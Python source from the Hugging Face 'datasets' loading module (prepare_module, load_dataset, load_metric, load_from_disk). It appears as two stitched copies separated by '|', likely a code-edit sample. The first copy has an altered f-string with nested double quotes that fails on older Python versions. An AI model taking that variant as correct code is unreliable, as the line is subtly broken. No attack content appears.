for library_import_name, library_import_path in library_imports:
try:
lib = importlib.import_module(library_import_name) # noqa F841
except ImportError:
needs_to_be_installed.append((library_import_name, library_import_path))
if needs_to_be_installed:
raise ImportError(
f"To be able to use this {module_type}, you need to install the following dependencies"
f"{[lib_name for lib_name, lib_path in needs_to_be_installed]} using 'pip install "
f"{" ".join([lib_path for lib_name, lib_path in needs_to_be_installed])}' for instance'"
)
# Define a directory with a unique name in our dataset or metric folder
# path is: ./datasets|metrics/dataset|metric_name/hash_from_code/script.py
# we use a hash to be able to have multiple versions of a dataset/metric processing file together
hash = files_to_hash([local_path] + [loc[1] for loc in local_imports])
if force_local_path is None:
hash_folder_path = os.path.join(main_folder_path, hash)
else:
hash_folder_path = force_local_path
local_file_path = os.path.join(hash_folder_path, name)
dataset_infos_path = os.path.join(hash_folder_path, config.DATASETDICT_INFOS_FILENAME)
# Prevent parallel disk operations
lock_path = local_path + ".lock"
with FileLock(lock_path):
# Create main dataset/metrics folder if needed
if download_mode == GenerateMode.FORCE_REDOWNLOAD and os.path.exists(main_folder_path):
shutil.rmtree(main_folder_path)
if not os.path.exists(main_folder_path):
logger.info(f"Creating main folder for {module_type} {file_path} at {main_folder_path}")
os.makedirs(main_folder_path, exist_ok=True)
else:
logger.info(f"Found main folder for {module_type} {file_path} at {main_folder_path}")
# add an __init__ file to the main dataset folder if needed
init_file_path = os.path.join(main_folder_path, "__init__.py")
if not os.path.exists(init_file_path):
with open(init_file_path, "w"):
pass
# Create hash dataset folder if needed
if not os.path.exists(hash_folder_path):
logger.info(f"Creating specific version folder for {module_type} {file_path} at {hash_folder_path}")
os.makedirs(hash_folder_path)
else:
logger.info(f"Found specific version folder for {module_type} {file_path} at {hash_folder_path}")
# add an __init__ file to the hash dataset folder if needed
init_file_path = os.path.join(hash_folder_path, "__init__.py")
if not os.path.exists(init_file_path):
with open(init_file_path, "w"):
pass
# Copy dataset.py file in hash folder if needed
if not os.path.exists(local_file_path):
logger.info("Copying script file from %s to %s", file_path, local_file_path)
shutil.copyfile(local_path, local_file_path)
else:
logger.info("Found script file from %s to %s", file_path, local_file_path)
# Copy dataset infos file if needed
if not os.path.exists(dataset_infos_path):
if local_dataset_infos_path is not None:
logger.info("Copying dataset infos file from %s to %s", dataset_infos, dataset_infos_path)
shutil.copyfile(local_dataset_infos_path, dataset_infos_path)
else:
logger.info("Couldn't find dataset infos file at %s", dataset_infos)
else:
if local_dataset_infos_path is not None and not filecmp.cmp(local_dataset_infos_path, dataset_infos_path):
logger.info("Updating dataset infos file from %s to %s", dataset_infos, dataset_infos_path)
shutil.copyfile(local_dataset_infos_path, dataset_infos_path)
else:
logger.info("Found dataset infos file from %s to %s", dataset_infos, dataset_infos_path)
# Record metadata associating original dataset path with local unique folder
meta_path = local_file_path.split(".py")[0] + ".json"
if not os.path.exists(meta_path):
logger.info(f"Creating metadata file for {module_type} {file_path} at {meta_path}")
meta = {"original file path": file_path, "local file path": local_file_path}
# the filename is *.py in our case, so better rename to filenam.json instead of filename.py.json
with open(meta_path, "w", encoding="utf-8") as meta_file:
json.dump(meta, meta_file)
else:
logger.info(f"Found metadata file for {module_type} {file_path} at {meta_path}")
# Copy all the additional imports
for import_name, import_path in local_imports:
if os.path.isfile(import_path):
full_path_local_import = os.path.join(hash_folder_path, import_name + ".py")
if not os.path.exists(full_path_local_import):
logger.info("Copying local import file from %s at %s", import_path, full_path_local_import)
shutil.copyfile(import_path, full_path_local_import)
else:
logger.info("Found local import file from %s at %s", import_path, full_path_local_import)
elif os.path.isdir(import_path):
full_path_local_import = os.path.join(hash_folder_path, import_name)
if not os.path.exists(full_path_local_import):
logger.info("Copying local import directory from %s at %s", import_path, full_path_local_import)
shutil.copytree(import_path, full_path_local_import)
else:
logger.info("Found local import directory from %s at %s", import_path, full_path_local_import)
else:
raise OSError(f"Error with local import at {import_path}")
if force_local_path is None:
module_path = ".".join(
[datasets_modules_name if dataset else metrics_modules_name, short_name, hash, short_name]
)
else:
module_path = local_file_path
# make the new module to be noticed by the import system
importlib.invalidate_caches()
if return_resolved_file_path:
return module_path, hash, file_path
return module_path, hash
def load_metric(
path: str,
config_name: Optional[str] = None,
process_id: int = 0,
num_process: int = 1,
cache_dir: Optional[str] = None,
experiment_id: Optional[str] = None,
keep_in_memory: bool = False,
download_config: Optional[DownloadConfig] = None,
download_mode: Optional[GenerateMode] = None,
script_version: Optional[Union[str, Version]] = None,
**metric_init_kwargs,
) -> Metric:
r"""Load a `datasets.Metric`.
Args:
path (``str``):
path to the metric processing script with the metric builder. Can be either:
- a local path to processing script or the directory containing the script (if the script has the same name as the directory),
e.g. ``'./metrics/rouge'`` or ``'./metrics/rogue/rouge.py'``
- a metric identifier on the HuggingFace datasets repo (list all available metrics with ``datasets.list_metrics()``)
e.g. ``'rouge'`` or ``'bleu'``
config_name (Optional ``str``): selecting a configuration for the metric (e.g. the GLUE metric has a configuration for each subset)
process_id (Optional ``int``): for distributed evaluation: id of the process
num_process (Optional ``int``): for distributed evaluation: total number of processes
cache_dir (Optional str): path to store the temporary predictions and references (default to `~/.cache/metrics/`)
experiment_id (``str``): A specific experiment id. This is used if several distributed evaluations share the same file system.
This is useful to compute metrics in distributed setups (in particular non-additive metrics like F1).
keep_in_memory (bool): Whether to store the temporary results in memory (defaults to False)
download_config (Optional ``datasets.DownloadConfig``: specific download configuration parameters.
download_mode (Optional `datasets.GenerateMode`): select the download/generate mode - Default to REUSE_DATASET_IF_EXISTS
script_version (Optional ``Union[str, datasets.Version]``): if specified, the module will be loaded from the datasets repository
at this version. By default it is set to the local version fo the lib. Specifying a version that is different from
your local version of the lib might cause compatibility issues.
Returns:
`datasets.Metric`
"""
module_path, hash = prepare_module(
path,
script_version=script_version,
download_config=download_config,
download_mode=download_mode,
dataset=False,
)
metric_cls = import_main_class(module_path, dataset=False)
metric = metric_cls(
config_name=config_name,
process_id=process_id,
num_process=num_process,
cache_dir=cache_dir,
keep_in_memory=keep_in_memory,
experiment_id=experiment_id,
**metric_init_kwargs,
)
# Download and prepare resources for the metric
metric.download_and_prepare(download_config=download_config)
return metric
def load_dataset(
path: str,
name: Optional[str] = None,
data_dir: Optional[str] = None,
data_files: Union[Dict, List] = None,
split: Optional[Union[str, Split]] = None,
cache_dir: Optional[str] = None,
features: Optional[Features] = None,
download_config: Optional[DownloadConfig] = None,
download_mode: Optional[GenerateMode] = None,
ignore_verifications: bool = False,
keep_in_memory: Optional[bool] = None,
save_infos: bool = False,
script_version: Optional[Union[str, Version]] = None,
use_auth_token: Optional[Union[bool, str]] = None,
task: Optional[Union[str, TaskTemplate]] = None,
streaming: bool = False,
**config_kwargs,
) -> Union[DatasetDict, Dataset, IterableDatasetDict, IterableDataset]:
"""Load a dataset.
This method does the following under the hood:
1. Download and import in the library the dataset loading script from ``path`` if it's not already cached inside the library.
Processing scripts are small python scripts that define the citation, info and format of the dataset,
contain the URL to the original data files and the code to load examples from the original data files.
You can find some of the scripts here: https://github.com/huggingface/datasets/datasets
and easily upload yours to share them using the CLI ``huggingface-cli``.
You can find the complete list of datasets in the Datasets Hub at https://huggingface.co/datasets
2. Run the dataset loading script which will:
* Download the dataset file from the original URL (see the script) if it's not already downloaded and cached.
* Process and cache the dataset in typed Arrow tables for caching.
Arrow table are arbitrarily long, typed tables which can store nested objects and be mapped to numpy/pandas/python standard types.
They can be directly access from drive, loaded in RAM or even streamed over the web.
3. Return a dataset built from the requested splits in ``split`` (default: all).
Args:
path (:obj:`str`): Path to the dataset processing script with the dataset builder. Can be either:
- a local path to processing script or the directory containing the script (if the script has the same name as the directory),
e.g. ``'./dataset/squad'`` or ``'./dataset/squad/squad.py'``.
- a dataset identifier in the HuggingFace Datasets Hub (list all available datasets and ids with ``datasets.list_datasets()``)
e.g. ``'squad'``, ``'glue'`` or ``'openai/webtext'``.
name (:obj:`str`, optional): Defining the name of the dataset configuration.
data_files (:obj:`str`, optional): Defining the data_files of the dataset configuration.
data_dir (:obj:`str`, optional): Defining the data_dir of the dataset configuration.
split (:class:`Split` or :obj:`str`): Which split of the data to load.
If None, will return a `dict` with all splits (typically `datasets.Split.TRAIN` and `datasets.Split.TEST`).
If given, will return a single Dataset.
Splits can be combined and specified like in tensorflow-datasets.
cache_dir (:obj:`str`, optional): Directory to read/write data. Defaults to "~/datasets".
features (:class:`Features`, optional): Set the features type to use for this dataset.
download_config (:class:`~utils.DownloadConfig`, optional): Specific download configuration parameters.
download_mode (:class:`GenerateMode`, optional): Select the download/generate mode - Default to REUSE_DATASET_IF_EXISTS
ignore_verifications (:obj:`bool`, default ``False``): Ignore the verifications of the downloaded/processed dataset information (checksums/size/splits/...).
keep_in_memory (:obj:`bool`, default ``None``): Whether to copy the dataset in-memory. If `None`, the dataset
will not be copied in-memory unless explicitly enabled by setting `datasets.config.IN_MEMORY_MAX_SIZE` to
nonzero. See more details in the :ref:`load_dataset_enhancing_performance` section.
save_infos (:obj:`bool`, default ``False``): Save the dataset information (checksums/size/splits/...).
script_version (:class:`~utils.Version` or :obj:`str`, optional): Version of the dataset script to load:
- For canonical datasets in the `huggingface/datasets` library like "squad", the default version of the module is the local version fo the lib.
You can specify a different version from your local version of the lib (e.g. "master" or "1.2.0") but it might cause compatibility issues.
- For community provided datasets like "lhoestq/squad" that have their own git repository on the Datasets Hub, the default version "main" corresponds to the "main" branch.
You can specify a different version that the default "main" by using a commit sha or a git tag of the dataset repository.
use_auth_token (``str`` or ``bool``, optional): Optional string or boolean to use as Bearer token for remote files on the Datasets Hub.
If True, will get token from `"~/.huggingface"`.
task (``str``): The task to prepare the dataset for during training and evaluation. Casts the dataset's :class:`Features` to standardized column names and types as detailed in :py:mod:`datasets.tasks`.
streaming (``bool``, default ``False``): If set to True, don't download the data files. Instead, it streams the data progressively while
iterating on the dataset. An IterableDataset or IterableDatasetDict is returned instead in this case.
Note that streaming works for datasets that use data formats that support being iterated over like txt, csv, jsonl for example.
Json files may be downloaded completely. Also streaming from remote zip or gzip files is supported but other compressed formats
like rar and xz are not yet supported. The tgz format doesn't allow streaming.
**config_kwargs: Keyword arguments to be passed to the :class:`BuilderConfig` and used in the :class:`DatasetBuilder`.
Returns:
:class:`Dataset` or :class:`DatasetDict`:
if `split` is not None: the dataset requested,
if `split` is None, a ``datasets.DatasetDict`` with each split.
or :class:`IterableDataset` or :class:`IterableDatasetDict` if streaming=True:
if `split` is not None: the dataset requested,
if `split` is None, a ``datasets.streaming.IterableDatasetDict`` with each split.
"""
ignore_verifications = ignore_verifications or save_infos
# Check streaming
if streaming:
if not config.AIOHTTP_AVAILABLE:
raise ImportError(
f"To be able to use dataset streaming, you need to install dependencies like aiohttp "
f"using 'pip install datasets[streaming]' or 'pip install aiohttp' for instance"
)
# Download/copy dataset processing script
module_path, hash, resolved_file_path = prepare_module(
path,
script_version=script_version,
download_config=download_config,
download_mode=download_mode,
dataset=True,
return_resolved_file_path=True,
use_auth_token=use_auth_token,
)
# Set the base path for downloads as the parent of the script location
if resolved_file_path is not None:
base_path = url_or_path_parent(resolved_file_path)
else:
base_path = None
# Get dataset builder class from the processing script
builder_cls = import_main_class(module_path, dataset=True)
# Instantiate the dataset builder
builder_instance: DatasetBuilder = builder_cls(
cache_dir=cache_dir,
name=name,
data_dir=data_dir,
data_files=data_files,
hash=hash,
features=features,
**config_kwargs,
)
# Retturn iterable dataset in case of streaming
if streaming:
# this extends the open and os.path.join functions for data streaming
extend_module_for_streaming(module_path, use_auth_token=use_auth_token)
return builder_instance.as_streaming_dataset(
split=split,
base_path=base_path,
use_auth_token=use_auth_token,
)
# Some datasets are already processed on the HF google storage
# Don't try downloading from google storage for the packaged datasets as text, json, csv or pandas
try_from_hf_gcs = path not in _PACKAGED_DATASETS_MODULES
# Download and prepare data
builder_instance.download_and_prepare(
download_config=download_config,
download_mode=download_mode,
ignore_verifications=ignore_verifications,
try_from_hf_gcs=try_from_hf_gcs,
base_path=base_path,
use_auth_token=use_auth_token,
)
# Build dataset for splits
keep_in_memory = (
keep_in_memory if keep_in_memory is not None else is_small_dataset(builder_instance.info.dataset_size)
)
ds = builder_instance.as_dataset(split=split, ignore_verifications=ignore_verifications, in_memory=keep_in_memory)
# Rename and cast features to match task schema
if task is not None:
ds = ds.prepare_for_task(task)
if save_infos:
builder_instance._save_infos()
return ds
def load_from_disk(dataset_path: str, fs=None, keep_in_memory: Optional[bool] = None) -> Union[Dataset, DatasetDict]:
"""
Loads a dataset that was previously saved using ``dataset.save_to_disk(dataset_path)`` from a dataset directory, or from a filesystem using either :class:`datasets.filesystems.S3FileSystem` or any implementation of ``fsspec.spec.AbstractFileSystem``.
Args:
dataset_path (:obj:`str`): Path (e.g. ``"dataset/train"``) or remote uri (e.g.
``"s3://my-bucket/dataset/train"``) of the Dataset or DatasetDict directory where the dataset will be
loaded from.
fs (:class:`~filesystems.S3FileSystem` or ``fsspec.spec.AbstractFileSystem``, optional, default ``None``):
Instance of of the remote filesystem used to download the files from.
keep_in_memory (:obj:`bool`, default ``None``): Whether to copy the dataset in-memory. If `None`, the dataset
will not be copied in-memory unless explicitly enabled by setting `datasets.config.IN_MEMORY_MAX_SIZE` to
nonzero. See more details in the :ref:`load_dataset_enhancing_performance` section.
Returns:
``datasets.Dataset`` or ``datasets.DatasetDict``
if `dataset_path` is a path of a dataset directory: the dataset requested,
if `dataset_path` is a path of a dataset dict directory: a ``datasets.DatasetDict`` with each split.
keep_in_memory (``bool``, default False): Whether to copy the data in-memory.
"""
# gets filesystem from dataset, either s3:// or file:// and adjusted dataset_path
if is_remote_filesystem(fs):
dest_dataset_path = extract_path_from_uri(dataset_path)
else:
fs = fsspec.filesystem("file")
dest_dataset_path = dataset_path
if not fs.exists(dest_dataset_path):
raise FileNotFoundError("Directory {} not found".format(dataset_path))
if fs.isfile(Path(dest_dataset_path, config.DATASET_INFO_FILENAME).as_posix()):
return Dataset.load_from_disk(dataset_path, fs, keep_in_memory=keep_in_memory)
elif fs.isfile(Path(dest_dataset_path, config.DATASETDICT_JSON_FILENAME).as_posix()):
return DatasetDict.load_from_disk(dataset_path, fs, keep_in_memory=keep_in_memory)
else:
raise FileNotFoundError(
"Directory {} is neither a dataset directory nor a dataset dict directory.".format(dataset_path)
)
| # coding=utf-8
# Copyright 2020 The HuggingFace Datasets Authors and the TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Access datasets."""
import filecmp
import importlib
import inspect
import json
import os
import re
import shutil
import time
from pathlib import Path
from typing import Dict, List, Optional, Tuple, Type, Union
from urllib.parse import urlparse
import fsspec
from . import config
from .arrow_dataset import Dataset
from .builder import DatasetBuilder
from .dataset_dict import DatasetDict, IterableDatasetDict
from .features import Features
from .filesystems import extract_path_from_uri, is_remote_filesystem
from .iterable_dataset import IterableDataset
from .metric import Metric
from .packaged_modules import _PACKAGED_DATASETS_MODULES, hash_python_lines
from .splits import Split
from .tasks import TaskTemplate
from .utils.download_manager import GenerateMode
from .utils.file_utils import (
DownloadConfig,
cached_path,
head_hf_s3,
hf_bucket_url,
hf_github_url,
hf_hub_url,
init_hf_modules,
url_or_path_join,
url_or_path_parent,
)
from .utils.filelock import FileLock
from .utils.info_utils import is_small_dataset
from .utils.logging import get_logger
from .utils.version import Version
if config.AIOHTTP_AVAILABLE:
from .streaming import extend_module_for_streaming
logger = get_logger(__name__)
def init_dynamic_modules(
name: str = config.MODULE_NAME_FOR_DYNAMIC_MODULES, hf_modules_cache: Optional[Union[Path, str]] = None
):
"""
Create a module with name `name` in which you can add dynamic modules
such as metrics or datasets. The module can be imported using its name.
The module is created in the HF_MODULE_CACHE directory by default (~/.cache/huggingface/modules) but it can
be overriden by specifying a path to another directory in `hf_modules_cache`.
"""
hf_modules_cache = init_hf_modules(hf_modules_cache)
dynamic_modules_path = os.path.join(hf_modules_cache, name)
os.makedirs(dynamic_modules_path, exist_ok=True)
if not os.path.exists(os.path.join(dynamic_modules_path, "__init__.py")):
with open(os.path.join(dynamic_modules_path, "__init__.py"), "w"):
pass
return dynamic_modules_path
def import_main_class(module_path, dataset=True) -> Optional[Union[Type[DatasetBuilder], Type[Metric]]]:
"""Import a module at module_path and return its main class:
- a DatasetBuilder if dataset is True
- a Metric if dataset is False
"""
module = importlib.import_module(module_path)
if dataset:
main_cls_type = DatasetBuilder
else:
main_cls_type = Metric
# Find the main class in our imported module
module_main_cls = None
for name, obj in module.__dict__.items():
if isinstance(obj, type) and issubclass(obj, main_cls_type):
if inspect.isabstract(obj):
continue
module_main_cls = obj
break
return module_main_cls
def files_to_hash(file_paths: List[str]) -> str:
"""
Convert a list of scripts or text files provided in file_paths into a hashed filename in a repeatable way.
"""
# List all python files in directories if directories are supplied as part of external imports
to_use_files: List[Union[Path, str]] = []
for file_path in file_paths:
if os.path.isdir(file_path):
to_use_files.extend(list(Path(file_path).rglob("*.[pP][yY]")))
else:
to_use_files.append(file_path)
# Get the code from all these files
lines = []
for file_path in to_use_files:
with open(file_path, mode="r", encoding="utf-8") as f:
lines.extend(f.readlines())
return hash_python_lines(lines)
def convert_github_url(url_path: str) -> Tuple[str, Optional[str]]:
"""Convert a link to a file on a github repo in a link to the raw github object."""
parsed = urlparse(url_path)
sub_directory = None
if parsed.scheme in ("http", "https", "s3") and parsed.netloc == "github.com":
if "blob" in url_path:
assert url_path.endswith(
".py"
), f"External import from github at {url_path} should point to a file ending with '.py'"
url_path = url_path.replace("blob", "raw") # Point to the raw file
else:
# Parse github url to point to zip
github_path = parsed.path[1:]
repo_info, branch = github_path.split("/tree/") if "/tree/" in github_path else (github_path, "master")
repo_owner, repo_name = repo_info.split("/")
url_path = "https://github.com/{}/{}/archive/{}.zip".format(repo_owner, repo_name, branch)
sub_directory = f"{repo_name}-{branch}"
return url_path, sub_directory
def get_imports(file_path: str):
r"""Find whether we should import or clone additional files for a given processing script.
And list the import.
We allow:
- library dependencies,
- local dependencies and
- external dependencies whose url is specified with a comment starting from "# From:' followed by the raw url to a file, an archive or a github repository.
external dependencies will be downloaded (and extracted if needed in the dataset folder).
We also add an `__init__.py` to each sub-folder of a downloaded folder so the user can import from them in the script.
Note that only direct import in the dataset processing script will be handled
We don't recursively explore the additional import to download further files.
Examples::
import tensorflow
import .c4_utils
import .clicr.dataset-code.build_json_dataset # From: https://raw.githubusercontent.com/clips/clicr/master/dataset-code/build_json_dataset
"""
lines = []
with open(file_path, mode="r", encoding="utf-8") as f:
lines.extend(f.readlines())
logger.debug("Checking %s for additional imports.", file_path)
imports: List[Tuple[str, str, str, Optional[str]]] = []
is_in_docstring = False
for line in lines:
docstr_start_match = re.findall(r'[\s\S]*?"""[\s\S]*?', line)
if len(docstr_start_match) == 1:
# flip True <=> False only if doctstring
# starts at line without finishing
is_in_docstring = not is_in_docstring
if is_in_docstring:
# import statements in doctstrings should
# not be added as required dependencies
continue
match = re.match(r"^import\s+(\.?)([^\s\.]+)[^#\r\n]*(?:#\s+From:\s+)?([^\r\n]*)", line, flags=re.MULTILINE)
if match is None:
match = re.match(
r"^from\s+(\.?)([^\s\.]+)(?:[^\s]*)\s+import\s+[^#\r\n]*(?:#\s+From:\s+)?([^\r\n]*)",
line,
flags=re.MULTILINE,
)
if match is None:
continue
if match.group(1):
# The import starts with a '.', we will download the relevant file
if any(imp[1] == match.group(2) for imp in imports):
# We already have this import
continue
if match.group(3):
# The import has a comment with 'From:', we'll retrieve it from the given url
url_path = match.group(3)
url_path, sub_directory = convert_github_url(url_path)
imports.append(("external", match.group(2), url_path, sub_directory))
elif match.group(2):
# The import should be at the same place as the file
imports.append(("internal", match.group(2), match.group(2), None))
else:
if match.group(3):
# The import has a comment with `From: git+https:...`, asks user to pip install from git.
url_path = match.group(3)
imports.append(("library", match.group(2), url_path, None))
else:
imports.append(("library", match.group(2), match.group(2), None))
return imports
def prepare_module(
path: str,
script_version: Optional[Union[str, Version]] = None,
download_config: Optional[DownloadConfig] = None,
download_mode: Optional[GenerateMode] = None,
dataset: bool = True,
force_local_path: Optional[str] = None,
dynamic_modules_path: Optional[str] = None,
return_resolved_file_path: bool = False,
**download_kwargs,
) -> Union[Tuple[str, str], Tuple[str, str, Optional[str]]]:
r"""
Download/extract/cache a dataset (if dataset==True) or a metric (if dataset==False)
Dataset and metrics codes are cached inside the the dynamic modules cache to allow easy import (avoid ugly sys.path tweaks)
and using cloudpickle (among other things).
Args:
path (str):
path to the dataset or metric script, can be either:
- a path to a local directory containing the dataset processing python script
- an url to a github or S3 directory with a dataset processing python script
script_version (Optional ``Union[str, datasets.Version]``):
If specified, the module will be loaded from the datasets repository at this version.
By default:
- it is set to the local version fo the lib.
- it will also try to load it from the master branch if it's not available at the local version fo the lib.
Specifying a version that is different from your local version of the lib might cause compatibility issues.
download_config (Optional ``datasets.DownloadConfig``: specific download configuration parameters.
dataset (bool): True if the script to load is a dataset, False if the script is a metric.
force_local_path (Optional str): Optional path to a local path to download and prepare the script to.
Used to inspect or modify the script folder.
dynamic_modules_path (Optional str, defaults to HF_MODULES_CACHE / "datasets_modules", i.e. ~/.cache/huggingface/modules/datasets_modules):
Optional path to the directory in which the dynamic modules are saved. It must have been initialized with :obj:`init_dynamic_modules`.
By default the datasets and metrics are stored inside the `datasets_modules` module.
return_resolved_file_path (Optional bool, defaults to False):
If True, the url or path to the resolved dataset or metric script is returned with the other ouputs
download_kwargs: optional attributes for DownloadConfig() which will override the attributes in download_config if supplied.
Return: Tuple[``str``, ``str``] with
1. The module path being
- the import path of the dataset/metric package if force_local_path is False: e.g. 'datasets.datasets.squad'
- the local path to the dataset/metric file if force_local_path is True: e.g. '/User/huggingface/datasets/datasets/squad/squad.py'
2. A hash string computed from the content of the dataset loading script.
"""
if download_config is None:
download_config = DownloadConfig(**download_kwargs)
download_config.extract_compressed_file = True
download_config.force_extract = True
module_type = "dataset" if dataset else "metric"
name = list(filter(lambda x: x, path.replace(os.sep, "/").split("/")))[-1]
if not name.endswith(".py"):
name = name + ".py"
# Short name is name without the '.py' at the end (for the module)
short_name = name[:-3]
# first check if the module is packaged with the `datasets` package
if dataset and path in _PACKAGED_DATASETS_MODULES:
try:
head_hf_s3(path, filename=name, dataset=dataset, max_retries=download_config.max_retries)
except Exception:
logger.debug(f"Couldn't head HF s3 for packaged dataset module '{path}'. Running in offline mode.")
module_path, hash = _PACKAGED_DATASETS_MODULES[path]
if return_resolved_file_path:
return module_path, hash, None
return module_path, hash
# otherwise the module is added to the dynamic modules
dynamic_modules_path = dynamic_modules_path if dynamic_modules_path else init_dynamic_modules()
module_name_for_dynamic_modules = os.path.basename(dynamic_modules_path)
datasets_modules_path = os.path.join(dynamic_modules_path, "datasets")
datasets_modules_name = module_name_for_dynamic_modules + ".datasets"
metrics_modules_path = os.path.join(dynamic_modules_path, "metrics")
metrics_modules_name = module_name_for_dynamic_modules + ".metrics"
if force_local_path is None:
main_folder_path = os.path.join(datasets_modules_path if dataset else metrics_modules_path, short_name)
else:
main_folder_path = force_local_path
# We have three ways to find the processing file:
# - if os.path.join(path, name) is a file or a remote url
# - if path is a file or a remote url
# - otherwise we assume path/name is a path to our S3 bucket
combined_path = os.path.join(path, name)
if os.path.isfile(combined_path):
file_path = combined_path
local_path = file_path
elif os.path.isfile(path):
file_path = path
local_path = path
else:
# Try github (canonical datasets/metrics) and then S3 (users datasets/metrics)
try:
head_hf_s3(path, filename=name, dataset=dataset, max_retries=download_config.max_retries)
script_version = str(script_version) if script_version is not None else None
if path.count("/") == 0: # canonical datasets/metrics: github path
file_path = hf_github_url(path=path, name=name, dataset=dataset, version=script_version)
try:
local_path = cached_path(file_path, download_config=download_config)
except FileNotFoundError:
if script_version is not None:
raise FileNotFoundError(
"Couldn't find remote file with version {} at {}. Please provide a valid version and a valid {} name".format(
script_version, file_path, "dataset" if dataset else "metric"
)
)
else:
github_file_path = file_path
file_path = hf_github_url(path=path, name=name, dataset=dataset, version="master")
try:
local_path = cached_path(file_path, download_config=download_config)
logger.warning(
"Couldn't find file locally at {}, or remotely at {}.\n"
"The file was picked from the master branch on github instead at {}.".format(
combined_path, github_file_path, file_path
)
)
except FileNotFoundError:
raise FileNotFoundError(
"Couldn't find file locally at {}, or remotely at {}.\n"
"The file is also not present on the master branch on github.".format(
combined_path, github_file_path
)
)
elif path.count("/") == 1: # users datasets/metrics: s3 path (hub for datasets and s3 for metrics)
if dataset:
file_path = hf_hub_url(path=path, name=name, version=script_version)
else:
file_path = hf_bucket_url(path, filename=name, dataset=False)
try:
local_path = cached_path(file_path, download_config=download_config)
except FileNotFoundError:
raise FileNotFoundError(
"Couldn't find file locally at {}, or remotely at {}. Please provide a valid {} name".format(
combined_path, file_path, "dataset" if dataset else "metric"
)
)
else:
raise FileNotFoundError(
"Couldn't find file locally at {}. Please provide a valid {} name".format(
combined_path, "dataset" if dataset else "metric"
)
)
except Exception as e: # noqa: all the attempts failed, before raising the error we should check if the module already exists.
if os.path.isdir(main_folder_path):
hashes = [h for h in os.listdir(main_folder_path) if len(h) == 64]
if hashes:
# get most recent
def _get_modification_time(module_hash):
return (Path(main_folder_path) / module_hash / name).stat().st_mtime
hash = sorted(hashes, key=_get_modification_time)[-1]
module_path = ".".join(
[datasets_modules_name if dataset else metrics_modules_name, short_name, hash, short_name]
)
logger.warning(
f"Using the latest cached version of the module from {os.path.join(main_folder_path, hash)} "
f"(last modified on {time.ctime(_get_modification_time(hash))}) since it "
f"couldn't be found locally at {combined_path} or remotely ({type(e).__name__})."
)
if return_resolved_file_path:
with open(os.path.join(main_folder_path, hash, short_name + ".json")) as cache_metadata:
file_path = json.load(cache_metadata)["original file path"]
return module_path, hash, file_path
return module_path, hash
raise
# Load the module in two steps:
# 1. get the processing file on the local filesystem if it's not there (download to cache dir)
# 2. copy from the local file system inside the modules cache to import it
base_path = url_or_path_parent(file_path) # remove the filename
dataset_infos = url_or_path_join(base_path, config.DATASETDICT_INFOS_FILENAME)
# Download the dataset infos file if available
try:
local_dataset_infos_path = cached_path(
dataset_infos,
download_config=download_config,
)
except (FileNotFoundError, ConnectionError):
local_dataset_infos_path = None
# Download external imports if needed
imports = get_imports(local_path)
local_imports = []
library_imports = []
for import_type, import_name, import_path, sub_directory in imports:
if import_type == "library":
library_imports.append((import_name, import_path)) # Import from a library
continue
if import_name == short_name:
raise ValueError(
f"Error in {module_type} script at {file_path}, importing relative {import_name} module "
f"but {import_name} is the name of the {module_type} script. "
f"Please change relative import {import_name} to another name and add a '# From: URL_OR_PATH' "
f"comment pointing to the original realtive import file path."
)
if import_type == "internal":
url_or_filename = url_or_path_join(base_path, import_path + ".py")
elif import_type == "external":
url_or_filename = import_path
else:
raise ValueError("Wrong import_type")
local_import_path = cached_path(
url_or_filename,
download_config=download_config,
)
if sub_directory is not None:
local_import_path = os.path.join(local_import_path, sub_directory)
local_imports.append((import_name, local_import_path))
# Check library imports
needs_to_be_installed = []
for library_import_name, library_import_path in library_imports:
try:
lib = importlib.import_module(library_import_name) # noqa F841
except ImportError:
needs_to_be_installed.append((library_import_name, library_import_path))
if needs_to_be_installed:
raise ImportError(
f"To be able to use this {module_type}, you need to install the following dependencies"
f"{[lib_name for lib_name, lib_path in needs_to_be_installed]} using 'pip install "
f"{' '.join([lib_path for lib_name, lib_path in needs_to_be_installed])}' for instance'"
)
# Define a directory with a unique name in our dataset or metric folder
# path is: ./datasets|metrics/dataset|metric_name/hash_from_code/script.py
# we use a hash to be able to have multiple versions of a dataset/metric processing file together
hash = files_to_hash([local_path] + [loc[1] for loc in local_imports])
if force_local_path is None:
hash_folder_path = os.path.join(main_folder_path, hash)
else:
hash_folder_path = force_local_path
local_file_path = os.path.join(hash_folder_path, name)
dataset_infos_path = os.path.join(hash_folder_path, config.DATASETDICT_INFOS_FILENAME)
# Prevent parallel disk operations
lock_path = local_path + ".lock"
with FileLock(lock_path):
# Create main dataset/metrics folder if needed
if download_mode == GenerateMode.FORCE_REDOWNLOAD and os.path.exists(main_folder_path):
shutil.rmtree(main_folder_path)
if not os.path.exists(main_folder_path):
logger.info(f"Creating main folder for {module_type} {file_path} at {main_folder_path}")
os.makedirs(main_folder_path, exist_ok=True)
else:
logger.info(f"Found main folder for {module_type} {file_path} at {main_folder_path}")
# add an __init__ file to the main dataset folder if needed
init_file_path = os.path.join(main_folder_path, "__init__.py")
if not os.path.exists(init_file_path):
with open(init_file_path, "w"):
pass
# Create hash dataset folder if needed
if not os.path.exists(hash_folder_path):
logger.info(f"Creating specific version folder for {module_type} {file_path} at {hash_folder_path}")
os.makedirs(hash_folder_path)
else:
logger.info(f"Found specific version folder for {module_type} {file_path} at {hash_folder_path}")
# add an __init__ file to the hash dataset folder if needed
init_file_path = os.path.join(hash_folder_path, "__init__.py")
if not os.path.exists(init_file_path):
with open(init_file_path, "w"):
pass
# Copy dataset.py file in hash folder if needed
if not os.path.exists(local_file_path):
logger.info("Copying script file from %s to %s", file_path, local_file_path)
shutil.copyfile(local_path, local_file_path)
else:
logger.info("Found script file from %s to %s", file_path, local_file_path)
# Copy dataset infos file if needed
if not os.path.exists(dataset_infos_path):
if local_dataset_infos_path is not None:
logger.info("Copying dataset infos file from %s to %s", dataset_infos, dataset_infos_path)
shutil.copyfile(local_dataset_infos_path, dataset_infos_path)
else:
logger.info("Couldn't find dataset infos file at %s", dataset_infos)
else:
if local_dataset_infos_path is not None and not filecmp.cmp(local_dataset_infos_path, dataset_infos_path):
